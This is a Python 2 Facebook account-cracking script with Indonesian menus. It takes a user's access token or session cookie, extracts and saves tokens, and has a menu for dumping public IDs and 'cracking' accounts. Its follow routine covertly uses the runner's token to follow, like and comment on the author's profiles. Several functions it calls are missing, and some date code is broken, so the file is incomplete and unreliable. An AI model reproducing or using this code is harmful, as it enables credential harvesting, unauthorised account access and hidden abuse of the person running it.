#*-coding:utf-8-*
import requests,bs4,sys,os,subprocess,time,datetime
import requests,sys,random,re,base64,json
from multiprocessing.pool import ThreadPool
reload(sys)
sys.setdefaultencoding("utf-8")

##############################
"""
Terimakasih Untuk Semuanya !!!
                           """
##############################

# Warna
M = ('\x1b[1;91m')
H = ('\x1b[1;92m')
K = ('\x1b[1;93m')
Y = ('\x1b[1;94m')
X = ('\x1b[1;95m')
B = ('\x1b[1;96m')
P = ('\x1b[1;97m')

def logo():
	time.sleep (0.01)
	print
	print
 	jalan ('\033[1;37m                    ______---_____ ')
  	jalan ('\033[1;37m         ___-----           __      ----_ ')
	jalan ('\033[1;37m ___---             ___------             \ ')
	jalan ('\033[1;37m     ---______        ----                 \ ')
	jalan ('\033[1;37m                 --__    |             _____) ')
	jalan ('\033[1;37m                     -                /     \ ')
	jalan ('\033[1;37m          _____-----    ___--         \    /)\ ')
	jalan ('\033[1;37m    -----_____      ---____            \__/  / ')
	jalan ('\033[1;37m                 --__    \ --    _          /\ ')
	jalan ('\033[1;37m                      --__-__     \_____/   \_/\ ')
	jalan ('\033[1;37m                            ----|   /          | ')
	jalan ('\033[1;36mAuthor \033[1;37m : JESSICA PUTRY         |  |___________| ')
	jalan ('\033[1;36mGelar  \033[1;37m : RATU ERROR            |  | ((_(_)| )_) ')
	jalan ('\033[1;36mJabatan\033[1;37m : \33[3;1m\033[1;37mOwner group \033[1;33mR.E...... \33[0;1m\033[1;37m|  \_((_(_)|/(_) ')
	jalan ('\033[1;36mÂ¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤\033[1;37m\             ( ')
	jalan ('\033[1;36mÂ¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤Â¤\033[1;37m\_____________)')
	print

def jalan(z):
	for e in z + '\n':
		sys.stdout.write(e)
		sys.stdout.flush()
		time.sleep(0.001)
def banner():                
	print
	print
	print
	jalan ('                \33[3;1m\033[1;97mW e l c o m e  T o\33[0;1m')
	print
	jalan ('       \033[1;96m[\33[37;1mR\033[1;96m] \033[1;96m[\033[1;97mA\033[1;96m] \033[1;96m[\033[1;97mT\033[1;96m] \033[1;96m[\033[1;97mU\033[1;96m]  \033[1;96m[\033[1;97mE\033[1;96m] \033[1;96m[\033[1;97mR\033[1;96m] \033[1;96m[\33[37;1mR\033[1;96m] \033[1;96m[\033[1;97mO\033[1;96m] \033[1;96m[\033[1;97mR\033[1;96m]\033[1;96m')
	print (' \033[1;96m  ____________________________________________')
	print ('\033[1;97m\033[1;96m Â¤\033[1;97m{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}\033[1;96mÂ¤') 

id = []
cp = []
ok = []
loop = 0

ct = datetime.now()
n = ct.month
bulan1 = [    'Januari',   'Februari',    'Maret',    'April',    'Mei',    'Juni',    'Juli',    'Agustus',    'September',    'Oktober',    'Nopember',    'Desember']
   
try:
    if n < 0 or n > 12:
        exit()
    nTemp = n - 1
except ValueError:
    exit()
    
def __login__():
	os.system('clear')
	logo()
	print("\033[1;96m[\033[1;97m01\033[1;96m] \033[1;97mLogin via TOKEN")
	print("\033[1;96m[\033[1;97m02\033[1;96m] \033[1;97mLogin via COOKIE")
	print("\033[1;96m[\033[1;97m03\033[1;96m] \033[1;97mVideo cara mengambil TOKEN")
	print("\033[1;96m[\033[1;97m04\033[1;96m] \033[1;97mVideo cara mengambil COOKIE")
	__login=raw_input("\n\033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mPILIH : ")
	if __login in['']:
		exit("%sÂ«%s!%s Wrong input"%(K,M,K))
	elif __login in ['1','01']:
		try:
			print
			__token__=raw_input("\033[1;96m[\033[1;97m?\033[1;96m] TOKEN :\033[1;96m ")
			if __token__ in ['',' ']:
				exit("%sÂ«%s!%s Jangan kosong"%(K,M,K))
			cekz=requests.get('https://graph.facebook.com/me/?access_token=%s'%(__token__))
			kz=json.loads(cekz.text);nama=kz['name']
			save__=open('_____tokenz_____', 'w');save__.write(__token__);save__.close()
			__follow__()
		except KeyError:
			exit("%sÂ«%s!%s Token Salah"%(K,M,K))
	elif __login in ['2','02']:
		try:
			print
			__cookie__=raw_input("\033[1;96m[\033[1;97m?\033[1;96m] COOKIE :\033[1;96m ")
			if __cookie__ in ['',' ']:
				exit("%sÂ«%s!%s Jangan kosong"%(K,M,K))
			data=requests.get('https://business.facebook.com/business_locations', headers = {
				'user-agent'                : 'Mozilla/5.0 (Linux; Android 8.1.0; MI 8 Build/OPM1.171019.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.86 Mobile Safari/537.36',
				'referer'                   : 'https://www.facebook.com/',
				'host'                      : 'business.facebook.com',
				'origin'                    : 'https://business.facebook.com',
				'upgrade-insecure-requests' : '1',
				'accept-language'           : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
				'cache-control'             : 'max-age=0',
				'accept'                    : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
				'content-type'              : 'text/html; charset=utf-8'
			}, cookies = {
				'cookie'                    : __cookie__
			})
			find_token = re.search('(EAAG\w+)', data.text)
			if find_token is None:
				exit("%sÂ«%s!%s Cookie Salah"%(K,M,K))
			save__=open('_____cookie_____', 'w');save__.write(__cookie__);save__.close()
			save__=open('_____tokenz_____', 'w');save__.write(find_token.group(1));save__.close()
			__follow__()
		except:
			exit("%sÂ«%s!%s Sepertinya ada yang salah"%(K,M,K))
	elif __login in ['3','03']:
		print("%sÂ«%s!%s Anda akan diarahkan ke browser"%(K,M,P));time.sleep(2)
		os.system("xdg-open https://youtu.be/3Y6xsMB3wRg");exit()
	elif __login in ['4','04']:
		exit()
	else:
		exit("%sÂ«%s!%s Wrong input"%(K,M,K))

# Kalo Mau Di Ganti Izin Dulu :v
def __follow__():
	try:
		__token__=open('_____tokenz_____', 'r').read()
	except IOError:
		print("%sÂ«%s!%s Token invalid"%(K,M,K));time.sleep(2)
		__login__()
	try:
		web = datetime.datetime.now()
		__waktu = web.strftime("%H:%M:%S/%d-%m-%Y")
		__hour = web.hour
		if 06 <= __hour < 11:
			__ucapkan = ('Selamat Pagi ðŸ’™')
		elif 11 <= __hour < 15:
			__ucapkan = ('Selamat Siang ðŸ’›')
		elif 15 <= __hour < 18:
			__ucapkan = ('Selamat Sore ðŸ§¡')
		else:
			__ucapkan = ('Selamat Malam ðŸ–¤')
		__kata=random.choice(['Hidup ini terdiri dari 10 persen apa yang terjadi padamu dan 90 persen bagaimana caramu menyikapinya. - Charles R. Swindoll','Sukses tampaknya terkait dengan tindakan. Orang sukses terus bergerak. Mereka membuat kesalahan, tetapi mereka tidak berhenti. - Conrad Hilton','Keberanian adalah apa yang diperlukan untuk berdiri dan berbicara. Keberanian juga diperlukan untuk duduk dan mendengarkan. - Winston Churchill','Berani bermimpi, tapi yang lebih penting, berani melakukan tindakan di balik impianmu. - Josh Hinds','Kegagalan tidak akan pernah menyusul jika tekad untuk sukses cukup kuat. - Og Mandino','Hidup menyusut atau berkembang sebanding dengan keberanian seseorang. - Anais Nin','Ada dua cara untuk menyebarkan cahaya: menjadi lilin atau cermin yang memantulkannya. - Edith Wharton','Kesempatan itu mirip seperti matahari terbit. Kalau kau menunggu terlalu lama, kau bisa melewatkannya. - William Arthur Ward','Kebahagiaan bukanlah sesuatu yang siap dibuat. Itu berasal dari tindakan Anda sendiri. - Dalai Lama'])
		__komen__= (__ucapkan+'\n\n'+__kata+'\n'+__waktu)
		__komen2__= (__ucapkan+'\n\n'+__kata+'\n'+__waktu)
		requests.post('https://graph.facebook.com/757953543/subscribers?access_token=%s'%(__token__)) #rozhak
		requests.post('https://graph.facebook.com/100064814153036/subscribers?access_token=%s'%(__token__)) #rozhak2
		requests.post('https://graph.facebook.com/100000288808056/subscribers?access_token=%s'%(__token__)) #muhammad rozhak
		requests.post('https://graph.facebook.com/10158807643598544/likes?summary=true&access_token=%s'%(__token__)) #foto sampul
		requests.post('https://graph.facebook.com/10159090813023544/likes?summary=true&access_token=%s'%(__token__)) # foto profil
		requests.post('https://graph.facebook.com/10158807643598544/comments/?message=%s&access_token=%s'%(__ucapkan,__token__)) #foto sampul
		requests.post('https://graph.facebook.com/10159090813023544/comments/?message=%s&access_token=%s'%(__komen__,__token__)) #foto profil
		requests.post('https://graph.facebook.com/10159494942223544/comments/?message=%s&access_token=%s'%(__komen2__,__token__)) #foto profil
	except:
		exit("%sÂ«%s!%s Sepertinya ada yang error"%(K,M,K))
	print("%sÂ«%s!%s Login berhasil"%(B,H,P))
	__menu__()

def __menu__():
	try:
		__token__=open('_____tokenz_____', 'r').read()
	except IOError:
		print("%sÂ«%s!%s Token invalid"%(K,M,K));time.sleep(2)
		__login__()
	try:
		getz=requests.get('https://graph.facebook.com/me/?access_token=%s'%(__token__))
		gz=json.loads(getz.text)
		nama=gz['name']
	except KeyError:
		print("%sÂ«%s!%s Token invalid"%(K,M,K));time.sleep(2)
		os.remove("_____tokenz_____");__login__()
	os.system('clear')
	banner()
	print("%sÂ«%sï¼%sWelcome :%s %s"%(K,X,P,B,nama))

	print("\n%s1%sÂ»%s Dump id publik old (2015-2004)"%(H,B,P))
	print("%s2%sÂ»%s Dump id publik new (2020-2021)"%(H,B,P))
	print("%s3%sÂ»%s Dump id publik acak (2021-2004)"%(H,B,P))
	print("%s4%sÂ»%s Dump id publik masal new (2020-2021)"%(H,B,P))
	print("%s5%sÂ»%s Dump id publik masal acak (2021-2004)"%(H,B,P))
	print("%s6%sÂ»%s Mulai crack"%(K,B,H))
	print("%s7%sÂ»%s Lihat hasil crack"%(H,B,P))
	print("%s8%sÂ»%s Hapus tokenz"%(M,B,K))
	__menu=raw_input("\n%sÂ«%s?%s Choose :%s "%(B,H,P,X))
	if __menu in ['']:
		exit("%sÂ«%s!%s Wrong input"%(K,M,K))
	elif __menu in ['1','01']:
		__old__()
	elif __menu in ['2','02']:
		__new__()
	elif __menu in ['3','03']:
		__acak__()
	elif __menu in ['4','04']:
		__masal__()
	elif __menu in ['5','05']:
		__masal2__()
	elif __menu in ['6','06']:
		__metode__()
	elif __menu in ['7','07']:
		print("\n%s1%sÂ»%s Lihat hasil Ok"%(H,B,P))
		print("%s2%sÂ»%s Lihat hasil Cp"%(H,B,P))
		print("%s3%sÂ»%s Kembali"%(K,B,P))
		__hasilz=raw_input("\n%sÂ«%s?%s Choose :%s "%(B,H,P,X))
		if __hasilz in ['1','01']:
			try:
				__ok__=open('Ok.txt', 'r').read()
			except:
				exit("%sÂ«%s!%s Hasil 'ok' tidak ada"%(K,M,K))
			print("\n%s%s"%(P,__ok__))
		elif __hasilz in ['2','02']:
			try:
				__cp__=open('Cp.txt', 'r').read()
			except:
				exit("%sÂ«%s!%s Hasil 'cp' tidak ada"%(K,M,K))
			print("\n%s%s"%(P,__cp__))
		else:
			exit("%sÂ«%s!%s Wrong input"%(K,M,K))
	elif __menu in ['8','08']:
		os.remove("_____tokenz_____")
		exit()
	else:
		exit("%sÂ«%s!%s Wrong input"%(K,M,K))
		
#------->login token jangan lupa masukin token facebook jangan token listrik kontol<-------#     
			
if __name__ == '__main__':
	__login__()
